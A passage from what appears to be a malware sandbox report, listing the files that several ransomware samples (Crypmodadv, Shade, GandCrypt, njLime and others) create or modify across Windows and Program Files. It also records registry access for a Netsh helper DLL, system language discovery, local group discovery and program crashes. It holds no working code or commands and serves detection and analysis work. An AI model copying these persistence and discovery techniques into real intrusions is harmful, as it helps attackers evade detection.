File opened for modification | C:\Program Files\Java\jdk-1.8\jmc.txt | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\W7.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_ReptileEye.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\Retail\Windows_Insider_Ninjacat_Unicorn-128x128.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\music_welcome_page.jpg | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-57x57-precomposed.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_hover.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\Windows NT\TableTextService\TableTextServiceDaYi.txt | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_SadMouth.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\example_icons2x.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files\7-Zip\Lang\pl.txt | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\Tented\TentMobile_24x20.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Lighting\Light\Studio.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Kiss.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\improved-office-to-pdf.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\OrientationControlMiddleCircle.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\Configuration\card_expiration_terms_dict.txt | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Viewpoints\Dark\MilitaryRight.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files\MergeGroup.vbe | Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\digsig_icons_2x.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\example_icons2x.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files\7-Zip\Lang\vi.txt | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity-dark.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
-
Drops file in Windows directory 64 IoCs
description | ioc | Process
File created | C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\images\splashscreen.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\security_watermark.jpg | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.ECApp_8wekyb3d8bbwe\Assets\Square150x150Logo.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\debugger\Callstack\images\activeFrameGlyph.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\cache\Desktop\9.txt | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\VisualProfiler\images\i_chartzoom_in_disabled.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Toolkit\Images\dash.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Windows.CBSPreview_cw5n1h2txyewy\Assets\Square150x150Logo.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1266_none_777e4c5802d14c18\AccountLogo.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\header\Images\dockV.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\Web\Wallpaper\Theme2\img9.jpg | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\WinSxS\amd64_microsoft-onecoreua..uetooth-userservice_31bf3856ad364e35_10.0.19041.153_none_e669b22d011fc6b2\DisplaySystemToastIcon.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.ECApp_8wekyb3d8bbwe\Assets\LeftClick.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\debugger\images\cssfileicon.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\Web\Wallpaper\Theme1\img3.jpg | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\darkBlue_GRAD.jpg | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Assets\AccountSmallLogo.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\memoryAnalyzer\images\status_heap_increase.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\VisualProfiler\images\i_f12_chartzoom_in.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\WinSxS\amd64_microsoft-onecoreua..uetooth-userservice_31bf3856ad364e35_10.0.19041.746_none_e6778e5b0114e5b0\MediaSystemToastIcon.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\perftools\images\i_save.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\dom\images\i_just_my_code.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1266_none_777e4c5802d14c18\NetworkProfilesWhite.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\debugger\Breakpoints\images\breakpointDisabled.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\header\Images\badgeBreak.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\ImmersiveControlPanel\images\DefaultPinTile.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\previewTabIcon.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\debugger\images\contentScriptEngineIcon.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-bth-cpl_31bf3856ad364e35_10.0.19041.1_none_0d0ae394ff68d5f5\@BthpropsNotificationLogo.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1266_none_777e4c5802d14c18\ProvisionedCertificatesWhite.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.AsyncTextService_8wekyb3d8bbwe\Assets\StoreLogo.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\common_icons.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\tree_icons.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\cache\Desktop\13.txt | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemResources\Windows.SystemToast.Calling\Images\Placeholder_buddy.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\ASPdotNET_logo.jpg | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\i_next.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\serviceworker\images\serviceworkericon.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1266_none_777e4c5802d14c18\AccountSmallLogo.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\colorPicker\sliderButton.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\dom\images\AddNewRuleIcon.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Windows.CBSPreview_cw5n1h2txyewy\Assets\Wide310x150Logo.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\misc_icons.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\toggleWordWrap.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\debugger\images\functionIcon.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\network\Images\i_clearCookies.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemResources\Windows.UI.ShellCommon\StartUI\Assets\officehub71x71.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-a..extservice.appxmain_31bf3856ad364e35_10.0.19041.1_none_04930b2bd1f9871f\Square150x150Logo.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\DomMutations\images\domDeleteAllBreakpoints.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\colorPicker\checkeredBackground.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\debugger\images\tsfileicon.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\dom\images\BreadcrumbScrollRight.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\Web\Screen\img105.jpg | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\Web\Wallpaper\Theme2\img7.jpg | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\WinSxS\amd64_hyperv-containerlicense_31bf3856ad364e35_10.0.19041.1_none_0b9d42260da91e9d\License.txt | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\dom\images\BreadcrumbScrollRightHover.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\Web\Screen\img104.jpg | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\perftools\images\i_usermark.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\header\Images\NavOverFlow_Start.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\storage\images\clearCookies.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\cache\Desktop\20.txt | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\WinSxS\amd64_microsoft-onecoreua..uetooth-userservice_31bf3856ad364e35_10.0.19041.746_none_e6778e5b0114e5b0\RemoteSystemToastIcon.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\minimize.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
File created | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\restore.png | Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
-
Detects Pyinstaller 2 IoCs
resource | yara_rule
behavioral1/files/0x0007000000023c90-272.dat | pyinstaller
behavioral1/files/0x0007000000023d0e-670.dat | pyinstaller
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description | ioc | Process
Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
Program crash 7 IoCs
pid | pid_target | Process | procid_target
5796 | 1136 | WerFault.exe | 150
7496 | 5536 | WerFault.exe | 186
6188 | 6232 | WerFault.exe | 195
5672 | 5276 | WerFault.exe | 174
5696 | 5148 | WerFault.exe | 177
6164 | 5276 | WerFault.exe | 174
6908 | 5148 | WerFault.exe | 177
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | vbc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ditziw.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | AVShieldPro.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | key7.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ditziw.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | hack.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Trojan-Ransom.Win32.Shade.psr-4d2b8abe7b2d79eb3cd44171a73a645d2d2370d64e51734208b7ef261b8e21ce.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Trojan-Ransom.Win32.Foreign.olpr-302fecaf77de168224abccd8a610dda5699e0d16ea5fa4577de83fad2f22433a.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | explorer.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Trojan-Ransom.Win32.Gimemo.cdqu-92c167bd5ce56b5e2798056e3f3129b43f019ba3370ac5a88894126b94cae16d.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | vbc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Trojan-Ransom.Win32.Blocker.mvrm-4138c885d1abbe86b0a700b1ff8489932b25c3fb3feaed4bb60f269d80ef22d4.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | svchost.exe
